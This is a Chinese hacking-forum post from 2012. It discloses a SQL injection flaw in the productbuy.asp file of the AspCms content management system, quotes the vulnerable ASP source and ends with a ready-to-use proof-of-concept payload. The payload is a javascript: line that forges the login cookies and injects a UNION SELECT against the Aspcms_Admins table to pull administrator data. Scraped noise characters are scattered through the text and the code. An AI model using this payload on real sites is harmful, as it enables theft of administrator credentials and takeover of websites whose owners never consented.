好久没上土司了,上来一看发现在删号名单内.....
J1 {' @: ~) _, U! j也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。6 V1 p& R' D, a% K& m
废话不多说,看代码:
4 R I% Y$ w# {' _ Q; d
4 D3 h3 q' F3 E; m4 Z<% g) p" v3 T4 \( k5 Y! `
* B- @7 t) ^& }0 L3 H& M6 F; V8 Aif action = "buy" then) S! v" P* G# _. v7 F! \! H
' n0 V" f4 @! Y3 x addOrder()
. M* n: [) A/ [0 P; x w, ~
% j8 i" k9 o3 _+ l0 melse
?+ d/ [6 J3 W" G4 r9 G
* i! L& v, ~# N x+ V echoContent()
, ?- u1 I: e' C% ^
1 F- f' i+ a: f# L# l7 z& Vend if
! L j# D" K& K% P, p: s( L; B$ M$ H7 w M u! q( m5 N+ R9 w
( ?* T$ x7 h9 ?9 O% D7 N
6 q7 r {- T6 }' N……略过
1 Z; Q$ N% ~8 R5 d4 n, U% l
% ]% e( I, V9 d9 W3 \0 z: i2 T. T5 B ~5 }1 F) o+ c! Y% P, w1 ?1 `
& y, V+ ?0 U$ q1 ?Sub echoContent()& O5 ]8 x0 f3 m' q- b, Z- }" ]
$ g9 K& ^6 W+ W$ T0 E1 z+ L
dim id
) W6 K# d9 G3 @5 p i2 d8 V0 Z3 M0 o% _0 Z# D; l. g- n% Q) f
id=getForm("id","get")/ n* p% K3 _5 c, G: _1 a
, s2 U1 o5 @, d7 \, h. G 5 v5 T1 C9 ~* ~
* \: g. P) n& A if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
- E( A j c% _& @; \" ]. h# I
2 m j* V7 Y2 _8 h3 ~4 E7 { * o1 W+ l/ L0 M2 D6 n: f
/ b2 `! I% r$ ~: U3 Q dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
0 x, B) y5 N3 [2 N: I' n% p' G, F" G! L5 Z' P. s1 y/ x0 T
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
6 x8 N5 X/ V' a6 m3 V0 p
" f' ]! Q! B5 e3 T! L Dim templatePath,tempStr( E! x7 e* e0 `9 g) H7 Q
; v; V9 U9 z! C2 g7 d- @
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
" F/ F5 u N, C$ b, x
, z; m* u e$ I( H
* C. i7 D/ [! i, t) D3 P2 u0 m, O2 i; n. i( p7 N. c; {8 ~
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
9 l% e" o2 D+ Y( q
% W4 I% j* c0 T1 s7 y selectproduct=rsObj(0): a5 G2 U( i, K/ l$ X
& Q- x$ c+ O0 Q
# N6 X' ~) q; I9 ]. N
2 e# I9 V* X( A- w' D Dim linkman,gender,phone,mobile,email,qq,address,postcode
g4 }' g8 f5 m& v5 x$ p) V9 \# N6 M O6 k# ]+ f. C
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",07 h9 a$ i& ~1 }+ V! w' _7 }
+ t8 e- V7 g- a( @; _* f if rCookie("loginstatus")=1 then - s& Y& w% z- N0 m% D
# [' F* o! q# O' n
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")5 |+ C/ m4 w$ P! C4 L: P ~
, ^9 B% s6 {( I' ]
linkman=rsObj("truename")
( i p6 ` d; G2 r8 ^3 R/ Y
+ n# q* x5 E" i+ M! ^ gender=rsObj("gender")
; }8 [" j" S6 d( |1 t5 S+ Z2 e0 U
phone=rsObj("phone")6 |6 Q( n" t9 ]% q, T
4 K" D) I8 W- j* C4 f) ] mobile=rsObj("mobile"), K$ x* r4 d' F9 G) K; q
/ |5 t0 I( O# T email=rsObj("email")
5 R/ \5 n5 y) _* n. y" ]
3 Y7 N, ~& q7 v3 L qq=rsObj("qq")+ R. _3 W% A, y* a( X0 V
2 a- x! w" z+ x$ A ^$ M
address=rsObj("address")
, u0 n% C1 V0 v) F" Q6 s5 E9 x5 W. w' H% k7 R
postcode=rsObj("postcode")8 U! L2 [) y# x2 C3 x' }
& r/ g) j+ Q) O4 r; I$ e else
- c) u2 r, u/ q- P" G! f. ]
; C- P/ b. ?2 O, w; c$ @ gender=1
: Z+ p- N- ?; }' o9 _% `. c2 c+ m7 H) d' P9 u8 L8 C- u
end if7 a. S$ F, I' W( [
4 G; h" g3 }2 I6 M) j rsObj.close()5 O I# U [" n% z
. G+ t5 z$ P! \ 2 y2 H" v" P- f. A! W
7 d" s. _6 r2 H with templateObj , B7 |9 S) B" J3 i- ~4 F# R
, K7 D; U" [* D- K. Z; B
.content=loadFile(templatePath)
( S) J/ f3 Y0 {% G+ v/ K5 ?& _. A4 |4 r: U, W
.parseHtml()
* B2 l. K% k' U0 [( S6 p" o" x, g* D, s! f
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
: N8 F3 E1 i6 Z1 Q6 i) H
! W0 q6 M; f4 ~ .content=replaceStr(.content,"[aspcms:linkman]",linkman)
9 n: O8 {2 A' s# _# A L3 O
/ W* ^. M! u% @/ S# e .content=replaceStr(.content,"[aspcms:gender]",gender) " y% Y) t7 e7 w/ M1 H* i
' J3 a: J. L. @# K2 P4 x- L
.content=replaceStr(.content,"[aspcms:phone]",phone) 0 G z: j' i* }
- G0 Z5 @% @2 i8 a5 k5 f
.content=replaceStr(.content,"[aspcms:mobile]",mobile) 0 m ?; X9 i, f
9 D( o- z) y2 K9 |% Y3 H
.content=replaceStr(.content,"[aspcms:email]",email) 3 [, f& o" ^! c2 x
5 s5 M# ]1 w; |+ e- X6 Y .content=replaceStr(.content,"[aspcms:qq]",qq)
8 a% t. K! {' a% i3 r0 j5 ^0 c: p7 A5 |8 {
.content=replaceStr(.content,"[aspcms:address]",address) , ]; V' j8 s! x
/ X$ X7 I. W3 ~
.content=replaceStr(.content,"[aspcms:postcode]",postcode) 2 `' V" o% s M o, Q
# ^. \% v) t1 l' {) A$ P i1 k
.parseCommon() + _% R4 [# {# d& W$ v1 }
' X, U S4 _9 M) W echo .content : |+ Q' \1 R, H) Q3 R' t
0 Q8 G3 e b$ c/ H+ G4 e end with2 k) j6 x3 S' p* d$ u" O" Y+ `
1 H# t) t; J% }) K6 ~
set templateobj =nothing : terminateAllObjects
. C" ]; V4 j7 T. L9 d- F* c7 A7 W, z
End Sub
4 e$ |: Y3 r& \$ ]! I( M漏洞很明显,没啥好说的, z7 m& P( M7 M, [( Z- _
poc:" P) U9 q" Q" S# B- u, x# w
4 k% S; h+ n0 K D6 }- g+ P8 @javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
. `3 {( Y" [+ e9 ], B7 a5 ]& I' x1 A+ w8 v4 `$ W
|
发表于 2012-12-27 08:35:05
收藏
支持
反对